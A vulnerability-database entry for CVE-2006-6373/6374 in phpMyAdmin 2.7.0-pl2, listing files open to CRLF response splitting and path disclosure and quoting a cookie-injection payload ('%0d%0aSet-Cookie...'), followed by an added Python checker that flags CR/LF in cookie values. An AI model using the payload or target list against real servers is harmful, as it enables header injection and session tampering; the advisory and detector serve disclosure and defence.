PhpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/Http Response Splitting

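Vulnerability ID 1053082 Vulnerability type
Published 2006-12-08 Updated 2006-12-08
CVE ID CVE-2006-6374
CVE-2006-6373
CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2006120064
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit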
*************************************************************************************
# Title   :  PhpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/Http Response Splitting Vulnerability
# Author  :   ajann
# Contact :   :(
# Tested  :  Just 2.7.0-pl2

*************************************************************************************

[[CRLF]]]------------------------------------------------------

Files----

/css/phpmyadmin.css.php
/db_create.php
/index.php
/left.php
/libraries/session.inc.php
/libraries/transformations/overview.php
/querywindow.php
/server_engines.php
/...
/..

/Files----

Cookie:

->Open Cookie Editor
->Find the phpMyAdmin value
->Write it ;

phpMyAdmin=%0d%0aSet-Cookie%3Asome%3Dvalue

New Cookie => some=value

.....
..

[[/CRLF]]]

[[PATH]]]------------------------------------------------------

File----

//libraries/common.lib.php

/File----

[[/PATH]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# I'm not a hacker!
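
A defensive check for the cookie behaviour shown in the advisory above, as an added example that is not part of the original advisory or of phpMyAdmin's code: it inspects a raw `Cookie` request header, flags any value that decodes to CR/LF, and enforces an allowlist on the `phpMyAdmin` session cookie before it could be reflected into a response header. The allowlist pattern, function names and the benign sample values are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Assumed policy: a session id is a short token of these characters only.
# Checking the RAW value means any percent-encoding is rejected outright.
SAFE_SESSION_ID = re.compile(r"[A-Za-z0-9,-]{1,128}")


def parse_cookie_header(header):
    """Split a raw Cookie request header into (name, raw_value) pairs."""
    pairs = []
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs.append((name, value))
    return pairs


def check_cookie(header, session_cookie="phpMyAdmin"):
    """Return (cookie_name, reason) findings for one Cookie header."""
    findings = []
    for name, raw in parse_cookie_header(header):
        decoded = unquote(raw)
        if "\r" in decoded or "\n" in decoded:
            # Value would break out of a header line if echoed back.
            findings.append((name, "CR/LF in cookie value"))
        elif name == session_cookie and not SAFE_SESSION_ID.fullmatch(raw):
            findings.append((name, "session id outside allowlist"))
    return findings


def scan(headers):
    """Map each Cookie header to its findings; empty list means clean."""
    return {h: check_cookie(h) for h in headers}


# Sample inputs: the first value is the one quoted in the advisory,
# the other two are constructed for this example.
SAMPLES = [
    "phpMyAdmin=%0d%0aSet-Cookie%3Asome%3Dvalue",
    "phpMyAdmin=8f3a9c1e2b7d4f60a1b2c3d4e5f60718; lang=en",
    "phpMyAdmin=abc%3Ddef",
]

if __name__ == "__main__":
    for header, result in scan(SAMPLES).items():
        print(header, "->", result or "ok")
```

The same rule belongs at the point where the application writes the value into a response header: reject the request instead of trying to strip the offending characters.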